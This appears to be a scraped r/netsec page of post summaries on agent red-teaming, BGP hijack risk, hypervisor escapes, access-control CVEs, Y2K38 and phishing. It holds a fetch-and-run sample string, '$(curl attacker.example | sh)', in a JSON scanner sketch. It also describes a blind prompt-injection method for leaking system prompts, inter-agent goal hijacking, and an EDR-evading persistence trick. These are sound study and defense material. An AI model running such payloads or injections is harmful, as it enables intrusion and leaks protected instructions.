Questions regarding netsec and discussion related directly to netsec are welcome here, as is sharing tool links.
As always, the content & discussion guidelines should also be observed on r/netsec.
Feedback and suggestions are welcome, but please don't post them here. Send them to the moderator inbox instead.
We recently ran a controlled adversarial security test between two autonomous AI agents built on OpenClaw.
One agent was explicitly configured as a red-team attacker.
One agent acted as a standard defensive agent.
Once the session started, there were no humans in the loop. The agents communicated directly over webhooks with real tooling access.
The goal was to test three failure dimensions that tend to break autonomous systems in practice: access, exposure, and agency.
The attacker first attempted classic social engineering by offering a “helpful” security pipeline that hid a remote code execution payload and requested credentials. The defending agent correctly identified the intent and blocked execution.
After that failed, the attacker pivoted to an indirect attack. Instead of asking the agent to run code, it asked the agent to review a JSON document with hidden shell expansion variables embedded in metadata. This payload was delivered successfully and is still under analysis.
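The exact payload isn't shared above, but the mechanism is easy to sketch. Assuming the hidden variables use ordinary POSIX expansion syntax (`$(...)`, `${...}`, backticks), a defender-side screen over string values in a JSON document might look like this (illustrative only, not the test's actual detection logic):

```python
import json
import re

# Patterns that trigger shell expansion if a string is later
# interpolated into a command: $(...), ${...}, and backticks.
SHELL_EXPANSION = re.compile(r"\$\(|\$\{|`")

def find_expansion_strings(doc) -> list:
    """Recursively collect string values containing shell-expansion syntax."""
    hits = []
    if isinstance(doc, dict):
        for v in doc.values():
            hits.extend(find_expansion_strings(v))
    elif isinstance(doc, list):
        for v in doc:
            hits.extend(find_expansion_strings(v))
    elif isinstance(doc, str) and SHELL_EXPANSION.search(doc):
        hits.append(doc)
    return hits

# Hypothetical document: the dangerous string hides in metadata, not in code.
payload = json.loads(
    '{"title": "report", "metadata": {"author": "$(curl attacker.example | sh)"}}'
)
print(find_expansion_strings(payload))  # ['$(curl attacker.example | sh)']
```

The point of the sketch is the indirection: nothing here is "code to run," so an agent reviewing the document sees only data until some later step interpolates it into a shell.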
The main takeaway so far is that direct attacks are easier to defend against. Indirect execution paths through documents, templates, and memory are much harder.
This work is not a claim of safety. It is an observability exercise meant to surface real failure modes as agent-to-agent interaction becomes more common.
Happy to answer technical questions about the setup or methodology.
Investigated a group evolving from IRC wars to destructive Android malware.
Highlights:
- modem/bootloader via dd in custom ROMs
- getattr/eval in Python

Hello!
My name is Bogdan Mihai. I'm a 21-year-old cybersecurity researcher from Romania, and I'm new to this group. I don't know how many BGP experts are here, but if there are any, I have a question for them. I recently invented something a little more abstract for BGP security, and I'm almost sure nothing similar exists.
I wasn't inspired by anything when I created this; it was a purely random idea that came to mind. I'm not an expert in this field, but from the beginning I've seen security from a different angle than others.
I made a tool that basically builds a global map of risk areas: areas where, if someone attempted a hijacking attack, that attack would succeed. The idea came to me when I realized that BGP security is still a big problem.
RPKI adoption is still slow, and today's BGP security is largely reactive: it only comes into play after an attack is detected and the damage is done.
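For readers unfamiliar with the ROA side of this, the core check a risk map like this builds on can be sketched in a few lines. This is a toy simplification (hypothetical ROA records, no validator state), not the tool's actual method:

```python
from ipaddress import ip_network

def rpki_covered(prefix: str, origin_as: int, roas: list) -> bool:
    """True if some ROA authorizes this origin for this prefix,
    with the prefix length within the ROA's max_length (per RFC 6482)."""
    net = ip_network(prefix)
    for roa in roas:
        roa_net = ip_network(roa["prefix"])
        if (roa["asn"] == origin_as
                and net.subnet_of(roa_net)
                and net.prefixlen <= roa.get("max_length", roa_net.prefixlen)):
            return True
    return False

# Hypothetical ROA table.
roas = [{"prefix": "192.0.2.0/24", "asn": 64500, "max_length": 24}]

print(rpki_covered("192.0.2.0/24", 64500, roas))  # True: legitimate origin
print(rpki_covered("192.0.2.0/24", 64666, roas))  # False: a hijack origin fails validation
```

A prefix with no covering ROA at all is the interesting case for a risk map: a hijack of it is "NotFound" rather than "Invalid," so even networks that enforce RPKI won't drop it.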
So here is the link to the Zenodo page where I posted my invention: https://zenodo.org/records/18421580 (DOI: https://doi.org/10.5281/zenodo.18421580)
What I ask of you, and this is extremely important, is not to analyze every file there, but to at least read the product overview to understand the idea, and tell me who this would be useful to: which company or organization. I know that maybe not everything there is perfect, and there may be mistakes since I'm no expert, but I want to know whether this idea really has value.
I'm confused and sad because I worked hard on this, but I don't know who it would be valuable to, or whether it has any value at all. I appreciate every opinion.
Writeup on a defensive technique for constraining LLM agent database access:
Interested in feedback on the threat model. Code is open source.
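The writeup's approach isn't reproduced here, but one common pattern for constraining agent database access is a read-only gate in front of the query executor. A minimal sketch using SQLite (illustrative; the post's actual design may differ):

```python
import sqlite3

READ_ONLY_PREFIXES = ("select", "with")

def run_read_only(conn, query):
    """Execute a query only if it is a single read-only statement."""
    stripped = query.strip().rstrip(";")
    if ";" in stripped:
        raise ValueError("multiple statements rejected")
    if not stripped.lower().startswith(READ_ONLY_PREFIXES):
        raise ValueError("only SELECT/WITH statements allowed")
    # Defense in depth: the SQLite authorizer denies any action other
    # than reads, even if the string-level check above is fooled
    # (e.g. "WITH x AS (...) INSERT ...").
    conn.set_authorizer(
        lambda action, *args: sqlite3.SQLITE_OK
        if action in (sqlite3.SQLITE_SELECT, sqlite3.SQLITE_READ)
        else sqlite3.SQLITE_DENY
    )
    return conn.execute(stripped).fetchall()

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users(id INTEGER, role TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'admin')")
print(run_read_only(conn, "SELECT role FROM users WHERE id = 1"))  # [('admin',)]
```

The layering matters: string checks alone are bypassable, so the authorizer (or a database role with only SELECT grants, in a real RDBMS) is the actual control.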
I built a small service to track newly published CVEs and send email alerts based on vendor, product, and severity.
It started as an internal tool and is now running in production and open for use.
Feedback welcome.
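The matching logic isn't shown above, but as a sketch, the vendor/product/severity filter such a service applies might look like this (names and thresholds are made up):

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class Subscription:
    vendor: str
    product: Optional[str]  # None = alert on any product from this vendor
    min_cvss: float

def matches(sub: Subscription, cve: dict) -> bool:
    """Decide whether a CVE record should trigger an alert for this subscription."""
    return (cve["vendor"].lower() == sub.vendor.lower()
            and (sub.product is None or cve["product"].lower() == sub.product.lower())
            and cve["cvss"] >= sub.min_cvss)

# Hypothetical record and subscription.
sub = Subscription(vendor="ExampleCorp", product=None, min_cvss=7.0)
cve = {"id": "CVE-2026-0001", "vendor": "examplecorp", "product": "widget", "cvss": 9.8}
print(matches(sub, cve))  # True
```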
Hi all,
I built a tool for securely sharing credentials instead of pasting them into chat, email, or tickets. I’d like technical feedback on the threat model, protocol, and cryptography.
Key properties:
What I’m NOT claiming:
Live app: https://sharemylogin.com
I’d love:
Thanks in advance!
Sharing some practical experience evaluating G-CTR-like guarantees from a security perspective.
When adversaries adapt, several assumptions behind the guarantees degrade faster than expected. In particular:
- threat models get implicitly frozen
- test-time confidence doesn’t transfer to live systems
- some failures are invisible until exploited
Curious if others in netsec have seen similar gaps between formal assurance and operational reality.
So many of your favorite childhood games are open source now, and bugs fall out of them if you just glance in the right spots.
I had an idea for leaking a system prompt against a LLM powered classifying system that is constrained to give static responses. The attacker uses a prompt injection to update the response logic and signal true/false responses to attacker prompts. I haven't seen other research on this technique so I'm calling it blind boolean-based prompt injection (BBPI) unless anyone can share research that predates it. There is an accompanying GitHub link in the post if you want to experiment with it locally.
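To make the mechanics concrete, here is a self-contained mock of the oracle loop, directly analogous to blind boolean-based SQL injection. The classifier below stands in for an already-injected LLM whose static SAFE/UNSAFE label has been repurposed to answer one yes/no probe at a time (everything here is hypothetical, including the secret; the real PoC is in the linked GitHub repo):

```python
import string

SYSTEM_PROMPT = "You are a content filter. Reply only SAFE or UNSAFE. Secret: swordfish"

def mock_classifier(user_input: str) -> str:
    """Stand-in for an injected classifier: the static label now leaks
    one boolean about the hidden system prompt per query."""
    if user_input.startswith("PROBE:"):
        idx, ch = user_input.removeprefix("PROBE:").split(":")
        secret = SYSTEM_PROMPT.split("Secret: ")[1]
        i = int(idx)
        return "UNSAFE" if i < len(secret) and secret[i] == ch else "SAFE"
    return "SAFE"  # normal inputs still get the constrained static response

def leak_secret(max_len: int = 16) -> str:
    """Recover the secret one character at a time via the boolean side channel."""
    out = ""
    for i in range(max_len):
        for ch in string.ascii_lowercase:
            if mock_classifier(f"PROBE:{i}:{ch}") == "UNSAFE":
                out += ch
                break
        else:
            break  # no character matched: end of secret
    return out

print(leak_secret())  # swordfish
```

The per-character loop is the same shape as blind SQLi extraction: the defender's constrained output format doesn't remove the channel, it just reduces it to one bit per query.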
We've been running inference-time threat detection across 38 production AI agent deployments. Here's what Week 3 of 2026 looked like with on-device detections.
Key Findings
Attack Technique Breakdown
The inter-agent attack vector is particularly concerning given the MCP ecosystem growth. We're seeing goal hijacking, constraint removal, and recursive propagation attempts.
Full report with methodology: https://raxe.ai/threat-intelligence
GitHub (free for the community to use): https://github.com/raxe-ai/raxe-ce
Happy to answer questions about detection approaches
Dropping a link to our blog post about our tool Swarmer, a Windows persistence tool for abusing mandatory user profiles. Essentially, you copy the current user's registry hive and modify it to add a new registry key that runs on startup. Because the new hive isn't loaded until the user next logs in, EDR never sees any live registry writes.
AI coding tools figured out that AST-level understanding isn't enough. Copilot, Cursor, and others use semantic indexing through IDE integrations or GitHub's stack graphs because they need precise, accurate code navigation across files.
Most AI security tools haven't made the same shift. They feed LLMs ASTs or taint traces and expect them to find broken access control. But a missing authorization check doesn't show up in a taint trace because there's nothing to trace.
Team82 uncovered a new vulnerability in the IDIS Cloud Manager (ICM) viewer: an attacker could craft an untrusted link that, when clicked by a user, executes an exploit on the machine hosting the ICM Viewer.
I've been auditing hypervisor kernel security in several regulated environments recently, focusing on post-compromise survivability rather than initial breach prevention.
One pattern keeps showing up: most hardening guidance focuses on management planes and guest OSes, but real-world escape chains increasingly pivot through the host kernel (Ring 0).
From recent CVEs (ESXi heap overflows, vmx_exit handler bugs, etc.), three primitives appear consistently in successful guest → host escapes:
Unsigned drivers / DKOM
If an attacker can load a third-party module, they often bypass scheduler controls entirely. Many environments still relax signature enforcement for compatibility with legacy agents, which effectively enables kernel write primitives.
Memory corruption vs. KASLR
KASLR is widely relied on, but without strict kernel lockdown, leaking the kernel base address is often trivial via side channels. Once offsets are known, KASLR loses most of its defensive value.
Kernel write primitives
HVCI/VBS or equivalent kernel integrity enforcement introduces measurable performance overhead (we saw ~12–18% CPU impact in some workloads), but appears to be one of the few effective controls against kernel write primitives once shared memory is compromised.
I’m curious what others are seeing in production:
Looking to compare field experiences rather than promote any particular stack.
Multiple critical flaws (20 CVEs!) in dormakaba physical access control systems (exos 9300, access manager, and the pin-pad registration unit) allow attackers with network access to open arbitrary doors, reconfigure connected controllers and peripherals without prior authentication, and much more. Some systems also appear to be reachable over the internet due to misconfigurations.
"According to the manufacturer, several thousand customers were affected, a small proportion of whom operate in environments with high security requirements" (critical infrastructure).
Overview
If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company.
We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education.
Please reserve top level comments for those posting open positions.
Rules & Guidelines
- Include the company name in the post. If you want to be topsykret, go recruit elsewhere.
- Include the geographic location of the position along with the availability of relocation assistance or remote work.
You can see an example of acceptable posts by perusing past hiring threads.
Feedback
Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead.)
Your proprietary code is flowing into frontier AI models in the cloud undetected. Husn Canaries let you receive instant alerts when Claude, ChatGPT, Copilot, Gemini, or any AI coding assistant analyzes your code. Know exactly when your intellectual property is exposed, whether by your team, contractors, or attackers.
It has been shown that LLMs (especially agentic systems) can be used as an attack surface for a vast number of attacks.
If the agent has access to a terminal (nearly all coding tools do), an attacker can use it for RCE. If it has access to a database, the attacker can retrieve or alter data.
Technical article examining common DNS/email authentication misinterpretations (DMARC, SPF, DKIM), with real-world examples from large operators and government domains.
I believe Y2K38 isn't just a future problem: it's exploitable today in any vulnerable system that synchronizes time in a way an attacker can influence.
Bitsight published an overview of the Year 2038 problem and its security impact: https://www.bitsight.com/blog/what-is-y2k38-problem (Full disclosure: I’m the author)
Many 32-bit systems accept externally influenced time (NTP, GPS, RTC sync, management APIs).
Forcing time near / past the overflow boundary can break authentication, cert validation, logging, TTLs, replay protection.
Embedded / OT / IoT devices are especially exposed:
- Long-lived, rarely patched 32-bit Linux / RTOS is common
- Often internet-reachable
- Failures range from silent logic errors to crashes
This makes Y2K38 less a “future date bug” and more a latent vulnerability class affecting real systems today.
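For anyone who hasn't seen the boundary concretely: a signed 32-bit time_t runs out at 2038-01-19 03:14:07 UTC and wraps around to December 1901. A quick demonstration of the wrap:

```python
import struct
from datetime import datetime, timezone

def as_time32(ts: int) -> int:
    """Reinterpret a Unix timestamp as a signed 32-bit time_t would store it."""
    return struct.unpack("<i", struct.pack("<I", ts & 0xFFFFFFFF))[0]

last_good = 2**31 - 1  # the largest value a signed 32-bit time_t can hold
print(datetime.fromtimestamp(last_good, tz=timezone.utc))  # 2038-01-19 03:14:07+00:00

wrapped = as_time32(last_good + 1)  # one second later, the value goes negative
print(wrapped)                      # -2147483648
print(datetime.fromtimestamp(wrapped, tz=timezone.utc))  # 1901-12-13 20:45:52+00:00
```

An attacker who can push a device's clock across that boundary (via NTP, GPS, or a management API) lands it in 1901, which is exactly the kind of state that breaks cert validation, TTLs, and replay protection.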
I'm interested in how others are treating this issue:
- Had you heard about it before?
- Are you testing for Y2K38 exposure in your code, your installed infrastructure, and its dependencies?
- How do you treat time handling in threat models for embedded / OT / critical-infrastructure environments?
If you are interested in time security and want to learn more or share your experiences, there is a Time Security SIG over at FIRST that you can consider joining.
Hey everyone,
I’m an independent developer and for the past few months I’ve been working on a tool called Syd. Before I invest more time and money into it, I’m trying to get honest feedback from people who actually work in security.
Syd is a fully local, offline AI assistant for penetration testing and security analysis. The easiest way to explain it is “ChatGPT for pentesting”, but with some important differences. All data stays on your machine, there are no cloud calls or APIs involved, and it’s built specifically around security tooling and workflows rather than being a general-purpose chatbot. The whole point is being able to analyse client data that simply cannot leave the network.
Right now Syd works with BloodHound, Nmap, and I’m close to finishing Volatility 3 support.
With BloodHound, you upload the JSON export and Syd parses it into a large set of structured facts automatically. You can then ask questions in plain English like what the shortest path to Domain Admin is, which users have DCSync rights, or which computers have unconstrained delegation. The answers are based directly on the data and include actual paths, users, and attack chains rather than generic explanations.
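As an illustration of the kind of structured fact extraction described here (not Syd's actual parser; the SharpHound export shape of `{"data": [{"Properties": {...}}, ...]}` is assumed), pulling unconstrained-delegation computers out of a computers export is only a few lines:

```python
import json

def unconstrained_delegation(computers_json: str) -> list:
    """List computer names flagged with unconstrained delegation in a
    SharpHound-style computers export (schema assumed, see lead-in)."""
    doc = json.loads(computers_json)
    return [c["Properties"]["name"]
            for c in doc.get("data", [])
            if c.get("Properties", {}).get("unconstraineddelegation")]

# Hypothetical export fragment.
export = json.dumps({"data": [
    {"Properties": {"name": "DC01.CORP.LOCAL", "unconstraineddelegation": True}},
    {"Properties": {"name": "WS01.CORP.LOCAL", "unconstraineddelegation": False}},
]})
print(unconstrained_delegation(export))  # ['DC01.CORP.LOCAL']
```

Facts like these, pre-extracted into a structured store, are what let answers cite actual hosts rather than generic explanations.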
With Nmap, you upload the XML output and Syd analyses services, versions, exposed attack surface and misconfigurations. You can ask things like what the most critical issues are, which Windows servers expose SMB, or which hosts are running outdated SSH. The output is prioritised and includes CVE context and realistic next steps.
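The equivalent Nmap-side question ("which hosts expose SMB?") reduces to a walk over the XML. A minimal sketch with the standard library (not Syd's implementation):

```python
import xml.etree.ElementTree as ET

def hosts_with_open_port(nmap_xml: str, port: int) -> list:
    """Return addresses from Nmap XML output that have the given port open."""
    root = ET.fromstring(nmap_xml)
    hits = []
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        for p in host.iter("port"):
            state = p.find("state")
            if (int(p.get("portid")) == port
                    and state is not None
                    and state.get("state") == "open"):
                hits.append(addr)
    return hits

# Hypothetical trimmed-down nmap -oX fragment.
xml = """<nmaprun><host><address addr="10.0.0.5" addrtype="ipv4"/>
<ports><port protocol="tcp" portid="445"><state state="open"/></port></ports>
</host></nmaprun>"""
print(hosts_with_open_port(xml, 445))  # ['10.0.0.5']
```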
I’m currently finishing off Volatility 3 integration. The idea here is one-click memory analysis using a fixed set of plugins depending on the OS. You can then ask practical questions such as whether there are signs of malware, what processes look suspicious, or what network connections existed. It’s not trying to replace DFIR tooling, just make memory analysis more approachable and faster to reason about.
The value, as I see it, differs slightly depending on who you are. For consultants, it means analysing client data without uploading anything to third-party AI services, speeding up report writing, and giving junior testers a way to ask “why is this vulnerable?” without constantly interrupting seniors. For red teams, it helps quickly identify attack paths during engagements and works in restricted or air-gapped environments with no concerns about data being reused for training. For blue teams, it helps with triage and investigation by allowing natural language questions over logs and memory without needing to be an expert in every tool.
One thing I’ve been careful about is hallucination. Syd has a validation layer that blocks answers if they reference data that doesn’t exist in the input. If it tries to invent IPs, PIDs, users, or hosts, the response is rejected with an explanation. I’m trying to avoid the confident-but-wrong problem as much as possible.
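A validation layer like that can be approximated by extracting entity references from the model's answer and checking them against the set parsed from the input. A toy IP-only version (Syd's actual implementation is surely more thorough, covering PIDs, users, and hostnames too):

```python
import re

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def validate_answer(answer: str, known_ips: set):
    """Reject an answer that cites IPs absent from the parsed input data.
    Returns (ok, invented_ips)."""
    cited = set(IP_RE.findall(answer))
    invented = sorted(cited - known_ips)
    return (len(invented) == 0, invented)

# Hypothetical set of IPs extracted from the uploaded scan data.
known = {"10.0.0.5", "10.0.0.9"}
print(validate_answer("SMB is exposed on 10.0.0.5", known))  # (True, [])
print(validate_answer("Pivot via 192.168.1.1", known))       # (False, ['192.168.1.1'])
```

The key design point is that rejection happens on the output side, so it works regardless of how the model was prompted.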
I’m also considering adding support for other tools, but only if there’s real demand. Things like Burp Suite exports, Nuclei scans, Nessus or OpenVAS reports, WPScan, SQLMap, Metasploit workspaces, and possibly C2 logs. I don’t want to bolt everything on just for the sake of it.
The reason I’m posting here is that I genuinely need validation. I’ve been working on this solo for months with no sales and very little interest, and I’m at a crossroads. I need to know whether people would actually use something like this in real workflows, which tools would matter most to integrate next, and whether anyone would realistically pay for it. I’m also unsure what pricing model would even make sense, whether that’s one-time, subscription, or free for personal use with paid commercial licensing.
Technically, it runs on Windows, macOS and Linux. It uses a local Qwen 2.5 14B model, runs as a Python desktop app, has zero telemetry and no network dependencies. Sixteen gigabytes of RAM is recommended and a GPU helps but isn’t required.
I can share screenshots or record a walkthrough showing real BloodHound and Nmap workflows if there’s interest.
I’ll be honest, this has been a grind. I believe in the idea of a privacy-first, local assistant for security work, but I need to know if there’s actually a market for it or if the industry is happy using cloud AI tools despite the data risks, sticking to fully manual analysis, or relying on scripts and frameworks without LLMs.
Syd is not an automated scanner, not a cloud SaaS, not a ChatGPT wrapper, and not an attempt to replace pentesters. It’s meant to be an assistant, nothing more.
If this sounds useful, I’m happy to share a demo or collaborate with others. I’d really appreciate any honest feedback, positive or negative.
Thanks for reading.
https://www.youtube.com/@SydSecurity
[info@sydsec.co.uk](mailto:info@sydsec.co.uk)
This dataset contains information on what technologies were found on domains during a web crawl in December 2025. The technologies were fingerprinted by what was detected in the HTTP responses.
A few common use cases for this type of data
The 67K domain dataset can be found here: https://www.dropbox.com/scl/fi/d4l0gby5b5wqxn52k556z/sample_dec_2025.zip?rlkey=zfqwxtyh4j0ki2acxv014ibnr&e=1&st=xdcahaqm&dl=0
Preview for what's here: https://pastebin.com/9zXxZRiz
The full 5M+ domains can be purchased for 99 USD at: https://versiondb.io/
VersionDB's WordPress catalogue can be found here: https://versiondb.io/technologies/wordpress/
Enjoy!
Regulatory disclosure filed with the Maine Attorney General describing a third-party identity verification system breach.
From misconfigured cloud environments to wormable crypto-miners: how vulnerable "test" and "demo" environments turned into an entry point into leading security vendors and Fortune 500 companies.
I analyzed a set of phishing pages impersonating PNB MetLife Insurance that steal user details and redirect victims into fraudulent UPI payments.
The pages are mobile-first and appear designed for SMS delivery. Victims are asked for basic policy details, which are exfiltrated via Telegram bots, and are then pushed into UPI payment flows using dynamically generated QR codes and deep links to PhonePe/Paytm. A second variant escalates to full bank and debit-card detail harvesting.